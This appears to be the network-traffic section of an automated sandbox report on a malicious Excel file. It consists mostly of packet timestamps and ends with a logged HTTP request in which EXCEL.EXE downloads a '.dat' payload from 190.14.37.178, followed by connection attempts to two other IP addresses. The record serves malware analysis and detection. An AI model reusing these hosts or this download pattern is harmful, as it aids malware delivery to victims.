                          Sep 28, 2021 13:16:18.490900040 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.490936041 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490945101 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.490963936 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490982056 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491002083 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491019964 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491039038 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491061926 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491086006 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491106987 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491111040 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.491146088 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.491147995 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491168022 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.491220951 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.492825031 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.569468975 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.569720984 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.697122097 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697144985 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697156906 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697170019 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697204113 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697227955 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697247028 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697262049 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697278976 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697292089 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697304964 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697318077 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697418928 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.701353073 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.701426983 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.756967068 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.757082939 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904599905 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904629946 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904653072 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904675961 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904676914 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904699087 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904709101 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904715061 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904720068 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904743910 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904768944 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904787064 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904791117 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904802084 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904808044 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904819012 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904823065 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904844999 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904867887 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904871941 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904886007 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904891968 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904917002 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904933929 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.906757116 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.944396973 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.944547892 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.112941027 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.112977982 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113003016 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113023043 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113044024 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113064051 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113085032 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113111973 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113133907 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113152027 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113174915 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113178015 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113198042 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113221884 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113245010 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113255978 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113265991 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113287926 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113306999 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113316059 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113332033 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113353014 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113358021 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113370895 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113392115 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113399029 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113413095 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113415003 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113435030 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113442898 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113459110 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113480091 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113506079 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.115709066 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.134794950 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.134943008 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321058989 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321079016 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321114063 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321140051 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321163893 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321187973 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321212053 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321244001 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321245909 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321271896 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321288109 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321299076 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321299076 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321307898 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321326971 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321330070 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321343899 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321352959 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321369886 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321402073 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.322047949 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.322120905 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.322911978 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.527571917 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.527852058 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530524015 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530556917 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530569077 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530586958 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530603886 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530616999 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530688047 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530704021 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530706882 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530720949 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530740976 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530755997 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530757904 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530774117 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530787945 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530791044 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530806065 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530822039 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530826092 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530838966 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530854940 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530858040 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530874014 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530890942 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530893087 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530905962 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530924082 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530925035 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530941010 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530951023 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530956984 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530975103 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530982971 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530992985 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.531014919 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.531042099 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.532603979 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.736519098 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736579895 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736599922 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736622095 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736644030 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736666918 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736685991 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736702919 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736720085 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736737967 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736753941 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736778975 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736790895 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736855984 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.736891031 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.739984035 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940233946 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940439939 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940665960 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940695047 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940716028 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940736055 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940742016 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940757990 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940759897 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940773964 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940783978 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940788984 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940805912 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940826893 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940826893 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940840006 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940850019 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940866947 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940872908 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940884113 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940898895 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940917015 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940933943 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940939903 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940953970 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940962076 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940977097 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940990925 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940992117 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.941005945 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.941026926 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.941047907 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.941054106 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.941066027 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.941071033 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.941080093 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.941097021 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.941118956 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.941119909 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.941128969 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.941143990 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.941162109 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.941168070 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.941178083 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.941188097 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.941209078 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.941303968 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.942603111 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.146953106 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147042036 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147080898 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147111893 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147147894 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147187948 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147190094 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147212029 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147228956 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147237062 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147249937 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147253036 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147268057 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147269011 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147294998 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147296906 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147308111 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147313118 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147329092 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147346020 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147357941 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147371054 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147392035 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147401094 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147413015 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147413969 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147425890 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147434950 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147447109 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147454977 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147479057 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147481918 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147488117 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.147500992 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147526979 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147542953 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147563934 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147574902 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147591114 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.147845984 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.149261951 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.336901903 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.337109089 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.357172966 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357219934 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357239962 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357253075 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357270002 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357286930 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357307911 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357326031 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357343912 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357361078 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357378006 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357393980 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357412100 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357429028 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357449055 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357471943 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357495070 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357513905 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357531071 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357547998 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357559919 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357578039 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357590914 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357608080 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.357630968 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.357666969 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.358444929 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.524602890 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.524736881 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.566169024 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.566250086 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.566298962 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.566364050 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.566417933 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.566422939 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.566437960 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.566482067 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.566492081 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.566536903 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.566590071 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:20.566612959 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.566672087 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:20.601140976 CEST4916680192.168.2.22185.183.96.67
                          Sep 28, 2021 13:16:23.595604897 CEST4916680192.168.2.22185.183.96.67
                          Sep 28, 2021 13:16:29.601278067 CEST4916680192.168.2.22185.183.96.67
                          Sep 28, 2021 13:16:41.601460934 CEST4916780192.168.2.22185.183.96.67
                          Sep 28, 2021 13:16:44.609719038 CEST4916780192.168.2.22185.183.96.67
                          Sep 28, 2021 13:16:50.616359949 CEST4916780192.168.2.22185.183.96.67
                          Sep 28, 2021 13:17:02.678422928 CEST4916880192.168.2.22185.250.148.213
                          Sep 28, 2021 13:17:05.687304020 CEST4916880192.168.2.22185.250.148.213
                          Sep 28, 2021 13:17:11.693898916 CEST4916880192.168.2.22185.250.148.213
                          Sep 28, 2021 13:17:23.709223032 CEST4916980192.168.2.22185.250.148.213
                          Sep 28, 2021 13:17:25.568614006 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:17:25.568808079 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:17:26.717984915 CEST4916980192.168.2.22185.250.148.213
                          Sep 28, 2021 13:17:32.724515915 CEST4916980192.168.2.22185.250.148.213
                          Sep 28, 2021 13:18:06.535682917 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:18:06.723344088 CEST8049165190.14.37.178192.168.2.22

                          HTTP Request Dependency Graph

                          • 190.14.37.178

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.2249165190.14.37.17880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          TimestampkBytes transferredDirectionData
                          Sep 28, 2021 13:16:16.226859093 CEST0OUTGET /44467.5523376157.dat HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: 190.14.37.178
                          Connection: Keep-Alive
                          Sep 28, 2021 13:16:17.249574900 CEST1INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Tue, 28 Sep 2021 11:16:17 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 387072
                          Connection: keep-alive
                          X-Powered-By: PHP/5.4.16
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: no-cache, no-store, must-revalidate
                          Content-Disposition: attachment; filename="44467.5523376157.dat"
